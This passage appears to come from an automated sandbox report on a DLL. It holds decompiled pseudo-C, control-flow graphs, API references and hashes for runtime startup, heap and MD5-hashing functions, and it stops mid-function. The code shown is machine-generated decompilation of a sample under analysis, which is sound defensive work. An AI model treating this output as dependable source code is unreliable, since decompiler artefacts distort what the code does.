              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: cf15da34657c48e4730c21e6ed1abb38830058b61196608147bae4b1be0d2f3a
              • Instruction ID: 3adca6da547702d7e42243ab49b4dddf3aaedfd03c98f5fd444dc930649f6b75
              • Opcode Fuzzy Hash: cf15da34657c48e4730c21e6ed1abb38830058b61196608147bae4b1be0d2f3a
              • Instruction Fuzzy Hash: ED1125B2D2D70A7FAB0113B55D88CAF29EEED8B29C7050116F902CD100FF60CD8141B2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA89881 Relevance: 3.1, APIs: 2, Instructions: 76COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1017 6da89881-6da8988f call 6da89ca0 call 6da89653 1021 6da89894-6da89897 1017->1021 1022 6da8989d-6da898b5 call 6da89558 1021->1022 1023 6da8996e 1021->1023 1027 6da898bb-6da898cc call 6da895b5 1022->1027 1028 6da89980-6da89987 call 6da89ec6 1022->1028 1025 6da89970-6da8997f 1023->1025 1033 6da8991b-6da89929 call 6da89964 1027->1033 1034 6da898ce-6da898f0 call 6da8a0c5 call 6da8a084 call 6da8a0a2 call 6da920e2 1027->1034 1033->1023 1039 6da8992b-6da89935 call 6da8a0bf 1033->1039 1034->1033 1053 6da898f2-6da898f9 call 6da8958a 1034->1053 1045 6da89956-6da8995f 1039->1045 1046 6da89937-6da89940 call 6da89713 1039->1046 1045->1025 1046->1045 1052 6da89942-6da89954 1046->1052 1052->1045 1053->1033 1057 6da898fb-6da89918 call 6da920b7 1053->1057 1057->1033
              C-Code - Quality: 80%
              			E6DA89881(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6DA89CA0(__ebx, __edi, __esi);
				_t43 = E6DA89653(__ecx, __edx, 0); // executed
				_t90 = 0x6dab10b0;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6DA89558();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6dad5180;
					if( *0x6dad5180 != 0) {
						E6DA89EC6(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6dab10d0);
						E6DA89CA0(1, __edi, __esi);
						_t48 =  *0x6dad51a4; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6dad51a4 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6DA89558();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6dad5180 - 2;
							if( *0x6dad5180 != 2) {
								E6DA89EC6(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6dab10f8);
								E6DA89CA0(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6DA8982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_push(_t86);
											_t115 = E6DA864F0( *((intOrPtr*)(_t123 + 8)), _t110);
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_push(_t86);
													_t59 = E6DA864F0( *((intOrPtr*)(_t123 + 8)), _t56);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6DA8982E(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6DA89B43( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6dad51a4 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6DA89623(1, _t90, 1, _t113);
								E6DA8A090();
								E6DA8A0F1();
								 *0x6dad5180 =  *0x6dad5180 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6DA89A1D();
								_t67 = E6DA897C4( *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6DA89A2A();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6dad5180 = 1;
						if(E6DA895B5(_t132) != 0) {
							E6DA8A084(E6DA8A0C5());
							E6DA8A0A2();
							_t80 = E6DA920E2(0x6daa41dc, 0x6daa41f0);
							_pop(_t102);
							if(_t80 == 0 && E6DA8958A(1, _t102) != 0) {
								E6DA920B7(0x6daa4160, 0x6daa41d8);
								 *0x6dad5180 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6DA89964();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6DA8A0BF();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6DA89713(_t85, _t106, _t121, _t138) != 0) {
									 *0x6daa415c( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6dad51a4 =  *0x6dad51a4 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}




















              0x6da89881
              0x6da89881
              0x6da89881
              0x6da89881
              0x6da89888
              0x6da8988f
              0x6da89894
              0x6da89897
              0x6da8996e
              0x6da8996e
              0x6da8996e
              0x00000000
              0x6da8989d
              0x6da898a2
              0x6da898a5
              0x6da898a7
              0x6da898aa
              0x6da898ae
              0x6da898b5
              0x6da89982
              0x6da89987
              0x6da89988
              0x6da8998a
              0x6da8998f
              0x6da89994
              0x6da89999
              0x6da8999b
              0x6da899a2
              0x6da899aa
              0x6da899ad
              0x6da899b6
              0x6da899b9
              0x6da899bc
              0x6da899c3
              0x6da89a32
              0x6da89a37
              0x6da89a38
              0x6da89a3a
              0x6da89a3f
              0x6da89a44
              0x6da89a47
              0x6da89a49
              0x6da89a5a
              0x6da89a5a
              0x6da89a5e
              0x6da89a61
              0x6da89a6d
              0x6da89a6d
              0x6da89a7a
              0x6da89a7c
              0x6da89a7f
              0x6da89a81
              0x6da89a8c
              0x6da89a91
              0x6da89a93
              0x6da89a96
              0x6da89a98
              0x00000000
              0x00000000
              0x6da89a98
              0x6da89a63
              0x6da89a63
              0x6da89a66
              0x00000000
              0x6da89a68
              0x6da89a68
              0x6da89a9e
              0x6da89a9e
              0x6da89aa8
              0x6da89aaa
              0x6da89aad
              0x6da89ab0
              0x6da89ab2
              0x6da89ab4
              0x6da89ab6
              0x6da89abb
              0x6da89ac0
              0x6da89ac2
              0x6da89ac2
              0x6da89ac8
              0x6da89ac9
              0x6da89ace
              0x6da89ad4
              0x6da89ad4
              0x6da89ab4
              0x6da89ad9
              0x6da89adb
              0x6da89ae2
              0x6da89aec
              0x6da89aee
              0x6da89af1
              0x6da89af3
              0x6da89aff
              0x6da89b27
              0x6da89b27
              0x6da89add
              0x6da89add
              0x6da89ae0
              0x00000000
              0x00000000
              0x6da89ae0
              0x6da89adb
              0x6da89a66
              0x6da89b2a
              0x6da89b31
              0x6da89a4b
              0x6da89a4b
              0x6da89a51
              0x00000000
              0x6da89a53
              0x6da89a53
              0x6da89a53
              0x6da89a51
              0x6da89b36
              0x6da89b42
              0x6da899c5
              0x6da899c5
              0x6da899ca
              0x6da899cf
              0x6da899d4
              0x6da899db
              0x6da899df
              0x6da899e9
              0x6da899f5
              0x6da899f7
              0x6da899f7
              0x6da899f9
              0x6da899fc
              0x6da89a03
              0x6da89a08
              0x00000000
              0x6da89a08
              0x6da8999d
              0x6da8999d
              0x6da89a0a
              0x6da89a0d
              0x6da89a19
              0x6da89a19
              0x6da898bb
              0x6da898bb
              0x6da898cc
              0x6da898d3
              0x6da898d8
              0x6da898e7
              0x6da898ed
              0x6da898f0
              0x6da89905
              0x6da8990c
              0x6da89916
              0x6da89918
              0x6da89918
              0x6da898f0
              0x6da8991b
              0x6da89922
              0x6da89929
              0x00000000
              0x6da8992b
              0x6da89930
              0x6da89932
              0x6da89935
              0x6da89937
              0x6da89940
              0x6da8994e
              0x6da89954
              0x6da89954
              0x6da89940
              0x6da89956
              0x6da8995e
              0x6da8995e
              0x6da89970
              0x6da89973
              0x6da8997f
              0x6da8997f
              0x6da898b5

              APIs
              • __RTC_Initialize.LIBCMT ref: 6DA898CE
                • Part of subcall function 6DA8A084: RtlInitializeSListHead.NTDLL(6DAD51B8), ref: 6DA8A089
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6DA89938
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 3231365870-0
              • Opcode ID: 3ceceb245d4b0d561658138f923ccf918fefe71ccd9927004f62725d24ee4b73
              • Instruction ID: 355a28cd1daee30b0a0dd54c8be03c605e1fd5c8b5bf5ed38a1a6b0f9a21198e
              • Opcode Fuzzy Hash: 3ceceb245d4b0d561658138f923ccf918fefe71ccd9927004f62725d24ee4b73
              • Instruction Fuzzy Hash: 6E21023654C346AEEB146FB497007BC77B2AF1636CF058019EEA52B2D3CF6281C5C656
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9580C Relevance: 3.1, APIs: 2, Instructions: 65COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1060 6da9580c-6da95811 1061 6da95813-6da9582b 1060->1061 1062 6da95839-6da95842 1061->1062 1063 6da9582d-6da95831 1061->1063 1065 6da95854 1062->1065 1066 6da95844-6da95847 1062->1066 1063->1062 1064 6da95833-6da95837 1063->1064 1067 6da958ae-6da958b2 1064->1067 1070 6da95856-6da95863 GetStdHandle 1065->1070 1068 6da95849-6da9584e 1066->1068 1069 6da95850-6da95852 1066->1069 1067->1061 1071 6da958b8-6da958bb 1067->1071 1068->1070 1069->1070 1072 6da95890-6da958a2 1070->1072 1073 6da95865-6da95867 1070->1073 1072->1067 1074 6da958a4-6da958a7 1072->1074 1073->1072 1075 6da95869-6da95872 GetFileType 1073->1075 1074->1067 1075->1072 1076 6da95874-6da9587d 1075->1076 1077 6da9587f-6da95883 1076->1077 1078 6da95885-6da95888 1076->1078 1077->1067 1078->1067 1079 6da9588a-6da9588e 1078->1079 1079->1067
              C-Code - Quality: 86%
              			E6DA9580C() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x6dad5858 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
							_push(0xfffffff6);
						} else {
							if(_t22 == 1) {
								_push(0xfffffff5);
							} else {
								_push(0xfffffff4);
							}
						}
						_pop(_t23);
						_t28 = GetStdHandle(_t23);
						if(_t28 == 0xffffffff || _t28 == 0) {
							L16:
							 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
							 *(_t33 + 0x18) = 0xfffffffe;
							_t20 =  *0x6dad5844; // 0x128a5d8
							if(_t20 != 0) {
								_t20 =  *(_t20 + _t31 * 4);
								 *(_t20 + 0x10) = 0xfffffffe;
							}
							goto L18;
						} else {
							_t25 = GetFileType(_t28); // executed
							if(_t25 == 0) {
								goto L16;
							} else {
								_t20 = _t25 & 0x000000ff;
								 *(_t33 + 0x18) = _t28;
								if(_t20 != 2) {
									if(_t20 == 3) {
										 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000008;
									}
								} else {
									 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000040;
								}
								goto L18;
							}
						}
					} else {
						 *(_t33 + 0x28) =  *(_t33 + 0x28) | 0x00000080;
					}
					L18:
					_t31 = _t31 + 1;
				} while (_t31 != 3);
				return _t20;
			}










              0x6da95811
              0x6da95813
              0x6da95817
              0x6da95820
              0x6da9582b
              0x6da9583b
              0x6da9583f
              0x6da95842
              0x6da95854
              0x6da95844
              0x6da95847
              0x6da95850
              0x6da95849
              0x6da9584c
              0x6da9584c
              0x6da95847
              0x6da95856
              0x6da9585e
              0x6da95863
              0x6da95890
              0x6da95890
              0x6da95894
              0x6da9589b
              0x6da958a2
              0x6da958a4
              0x6da958a7
              0x6da958a7
              0x00000000
              0x6da95869
              0x6da9586a
              0x6da95872
              0x00000000
              0x6da95874
              0x6da95874
              0x6da95877
              0x6da9587d
              0x6da95888
              0x6da9588a
              0x6da9588a
              0x6da9587f
              0x6da9587f
              0x6da9587f
              0x00000000
              0x6da9587d
              0x6da95872
              0x6da95833
              0x6da95833
              0x6da95833
              0x6da958ae
              0x6da958ae
              0x6da958af
              0x6da958bb

              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6DA95858
              • GetFileType.KERNELBASE(00000000), ref: 6DA9586A
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: d6011a626fbfaa0cd19b634e17a9242fc3e8a976056f0ce2d7c4a5f61fe9ed24
              • Instruction ID: bc9ebf9358b09501056067eeeb268f2f1fb72e75ddad8165d06eedd34360fd58
              • Opcode Fuzzy Hash: d6011a626fbfaa0cd19b634e17a9242fc3e8a976056f0ce2d7c4a5f61fe9ed24
              • Instruction Fuzzy Hash: B411A27553C75286C7304D3E88967327AE4A747232BA88B5ED5B58E5F1C730D4C6E344
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA9458B Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1080 6da9458b-6da94597 1081 6da945c9-6da945d4 call 6da90403 1080->1081 1082 6da94599-6da9459b 1080->1082 1089 6da945d6-6da945d8 1081->1089 1084 6da9459d-6da9459e 1082->1084 1085 6da945b4-6da945c5 RtlAllocateHeap 1082->1085 1084->1085 1086 6da945a0-6da945a7 call 6da9cb07 1085->1086 1087 6da945c7 1085->1087 1086->1081 1092 6da945a9-6da945b2 call 6da911a2 1086->1092 1087->1089 1092->1081 1092->1085
              C-Code - Quality: 100%
              			E6DA9458B(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6DA90403())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6dad5c48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6DA9CB07();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6DA911A2(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






              0x6da94591
              0x6da94597
              0x6da945c9
              0x6da945ce
              0x6da945d4
              0x00000000
              0x6da945d4
              0x6da9459b
              0x6da9459d
              0x6da9459d
              0x6da945b4
              0x6da945bd
              0x6da945c5
              0x00000000
              0x00000000
              0x6da945a5
              0x6da945a7
              0x00000000
              0x00000000
              0x6da945aa
              0x6da945b0
              0x6da945b2
              0x00000000
              0x00000000
              0x6da945b2
              0x00000000

              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6DA945BD
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: 2b85b26d34151b21b432bc362282dabbe0ebaf08c6fb231569e02c6c9e6a123d
              • Instruction ID: e68b8bc02ec8ba14a03cd03714353322ee26ebaa31d5716a2c691b88825fd94e
              • Opcode Fuzzy Hash: 2b85b26d34151b21b432bc362282dabbe0ebaf08c6fb231569e02c6c9e6a123d
              • Instruction Fuzzy Hash: A7E0653957D72366E72116E99D00B6A7AD8AF4B6B1F164210ED34AE088DFD0DCC181E8
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 6DA82E60 Relevance: 21.3, APIs: 14, Instructions: 344encryptionCOMMON
              Download Yara Rule
              C-Code - Quality: 38%
              			E6DA82E60(void* __ebx, int* __ecx, signed int __edx, void* __edi, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				int _v20;
				long* _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				int _v52;
				signed int _v56;
				int* _v60;
				int _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v148;
				signed char _v164;
				void _v168;
				intOrPtr* _v180;
				signed int* _v192;
				signed int* _v196;
				signed int* _v208;
				signed int* _v212;
				char _v224;
				char _v228;
				int _v348;
				intOrPtr _v356;
				void* __esi;
				void* __ebp;
				int* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t158;
				void* _t173;
				intOrPtr _t183;
				signed int _t193;
				signed int _t198;
				signed int _t203;
				signed int _t206;
				signed int _t212;
				intOrPtr _t214;
				signed int _t220;
				signed int _t228;
				signed char _t235;
				int* _t237;
				signed int _t240;
				signed int _t242;
				intOrPtr* _t246;
				void* _t248;
				void* _t249;
				intOrPtr _t251;
				intOrPtr _t252;
				void* _t255;

				_t234 = __edx;
				_push(0xffffffff);
				_push(E6DAA2401);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t251;
				_t252 = _t251 - 0xd8;
				_push(__edi);
				_t237 = __ecx;
				_v60 = __ecx;
				_t242 = __edx;
				_v64 = 0;
				_v24 = 0;
				if(CryptAcquireContextA( &_v24, 0, 0, 0x18, 0xf0000000) == 0) {
					L5:
					 *_t237 = 0;
					_t237[4] = 0;
					_push(0);
					_t237[5] = 0xf;
					 *_t237 = 0;
					E6DA81770(_t237, 0x6daaf2c7);
					 *[fs:0x0] = _v16;
					return _t237;
				} else {
					_t136 =  &_v20;
					_v20 = 0;
					__imp__CryptCreateHash(_v24, 0x8003, 0, 0, _t136);
					_push(0);
					if(_t136 == 0) {
						L4:
						CryptReleaseContext(_v24);
						goto L5;
					} else {
						__imp__CryptHashData(_v20, _t242, _a4);
						if(_t136 != 0) {
							_v32 = 0;
							_t139 =  &_v32;
							_v52 = 4;
							__imp__CryptGetHashParam(_v20, 4, _t139,  &_v52, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								goto L3;
							} else {
								_t212 = _v32;
								_t206 = 0;
								_v56 = _t212;
								_t244 = 0;
								_v48 = 0;
								_v28 = 0;
								_v44 = 0;
								_v40 = 0;
								_v36 = 0;
								__eflags = _t212;
								if(_t212 == 0) {
									L15:
									_t141 =  &_v32;
									_v8 = 0;
									__imp__CryptGetHashParam(_v20, 2, _t206, _t141, 0);
									__eflags = _t141;
									if(__eflags != 0) {
										E6DA83BD0( &_v228, __eflags, _t212);
										_t244 = _t206;
										_v8 = 1;
										__eflags = _t244 - _v28;
										if(_t244 != _v28) {
											_t240 = _v28;
											asm("o16 nop [eax+eax]");
											do {
												 *((char*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xa0)) = 0x30;
												_t183 =  *((intOrPtr*)(_v228 + 4));
												 *((intOrPtr*)(_t249 + _t183 - 0xc0)) = 2;
												 *(_t249 + _t183 - 0xbc) = 0;
												 *( &_v208 +  *((intOrPtr*)(_v228 + 4))) =  *( &_v208 +  *((intOrPtr*)(_v228 + 4))) & 0xfffff9ff | 0x00000800;
												E6DA83E00( &_v228, _t234,  *_t244 & 0x000000ff);
												_t244 = _t244 + 1;
												__eflags = _t244 - _t240;
											} while (_t244 != _t240);
											_t237 = _v60;
										}
										__imp__CryptDestroyHash(_v20);
										CryptReleaseContext(_v24, 0);
										_v8 = 2;
										asm("xorps xmm0, xmm0");
										_t235 = _v164;
										 *_t237 = 0;
										_t237[4] = 0;
										_t237[5] = 0xf;
										 *_t237 = 0;
										_v64 = 4;
										asm("movq [ebp-0x48], xmm0");
										_v68 = 0;
										__eflags = (_t235 & 0x00000022) - 2;
										if((_t235 & 0x00000022) == 2) {
											L28:
											__eflags = _t235 & 0x00000004;
											if((_t235 & 0x00000004) != 0) {
												L31:
												_t214 = _v72;
												_t234 = _v76;
											} else {
												_t244 =  *_v196;
												__eflags = _t244;
												if(_t244 == 0) {
													goto L31;
												} else {
													_t234 =  *_v212;
													_t214 =  *_v180 - _t234 + _t244;
												}
											}
										} else {
											_t228 =  *_v192;
											__eflags = _t228;
											if(_t228 == 0) {
												goto L28;
											} else {
												__eflags = _t228 - _v168;
												_t229 =  <  ? _v168 : _t228;
												_t234 =  *_v208;
												_t214 = ( <  ? _v168 : _t228) - _t234;
											}
										}
										__eflags = _t234;
										if(_t234 != 0) {
											_push(_t214);
											E6DA81770(_t237, _t234);
										}
										_v8 = 1;
										 *((intOrPtr*)(_t249 +  *((intOrPtr*)(_v228 + 4)) - 0xe0)) = 0x6daaf3a8;
										_t90 = _v228 + 4; // 0x74736f69
										_t91 =  *_t90 - 0x50; // 0x74736f19
										 *((intOrPtr*)(_t249 +  *_t90 - 0xe4)) = _t91;
										E6DA83840( &_v224, _t244);
										_t96 = _v228 + 4; // 0x74736f69
										 *((intOrPtr*)(_t249 +  *_t96 - 0xe0)) = 0x6daaf448;
										_t100 = _v228 + 4; // 0x6dab006c
										_t101 =  *_t100 - 8; // 0x6dab0064
										 *((intOrPtr*)(_t249 +  *_t100 - 0xe4)) = _t101;
										_v8 = 3;
										_v148 = 0x6daaf3c8;
										E6DA88D06( &_v148);
										_t252 = _t252 + 4;
										__eflags = _t206;
										if(_t206 == 0) {
											goto L39;
										} else {
											_t158 = _t206;
											_t220 = _v40 - _t206;
											__eflags = _t220 - 0x1000;
											if(_t220 < 0x1000) {
												L37:
												_push(_t220);
												_push(_t206);
												goto L38;
											} else {
												_t206 =  *(_t206 - 4);
												_t220 = _t220 + 0x23;
												__eflags = _t158 - _t206 + 0xfffffffc - 0x1f;
												if(_t158 - _t206 + 0xfffffffc > 0x1f) {
													goto L42;
												} else {
													goto L37;
												}
											}
										}
									} else {
										__imp__CryptDestroyHash(_v20);
										CryptReleaseContext(_v24, 0);
										_push(0);
										 *_t237 = 0;
										_t237[4] = 0;
										_t237[5] = 0xf;
										 *_t237 = 0;
										E6DA81770(_t237, 0x6daaf2c7);
										_t193 = _v36;
										__eflags = _t193;
										if(_t193 == 0) {
											L39:
											 *[fs:0x0] = _v16;
											return _t237;
										} else {
											_t248 = _t244 - _t193;
											__eflags = _t248 - 0x1000;
											if(_t248 < 0x1000) {
												L20:
												_push(_t248);
												_push(_t193);
												L38:
												E6DA893C9();
												goto L39;
											} else {
												_t220 =  *(_t193 - 4);
												_t244 = _t248 + 0x23;
												__eflags = _t193 - _t220 + 0xfffffffc - 0x1f;
												if(_t193 - _t220 + 0xfffffffc > 0x1f) {
													goto L42;
												} else {
													_t193 = _t220;
													goto L20;
												}
											}
										}
									}
								} else {
									__eflags = _t212 - 0x7fffffff;
									if(_t212 > 0x7fffffff) {
										E6DA819E0(_t212);
										goto L41;
									} else {
										__eflags = _t212 - 0x1000;
										if(__eflags < 0) {
											_t198 = E6DA89399(_t237, 0, __eflags, _t212);
											_t255 = _t252 + 4;
											_t206 = _t198;
											goto L14;
										} else {
											_t27 = _t212 + 0x23; // 0x23
											_t202 = _t27;
											__eflags = _t27 - _t212;
											if(__eflags <= 0) {
												L41:
												E6DA81420();
												goto L42;
											} else {
												_t203 = E6DA89399(_t237, 0, __eflags, _t202);
												_t252 = _t252 + 4;
												__eflags = _t203;
												if(_t203 == 0) {
													L42:
													E6DA8DACF(_t206, _t220, _t234);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t249);
													_push(0xffffffff);
													_push(E6DAA23C0);
													_push( *[fs:0x0]);
													 *[fs:0x0] = _t252;
													_t246 = _t220 + 0x50;
													 *((intOrPtr*)( *((intOrPtr*)( *_t220 + 4)) + _t246 - 0x50)) = 0x6daaf3a8;
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x54)) =  *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) - 0x50;
													E6DA83840(_t246 - 0x4c, _t246, _t244);
													 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t246 - 0x50)) + 4)) + _t246 - 0x50)) = 0x6daaf448;
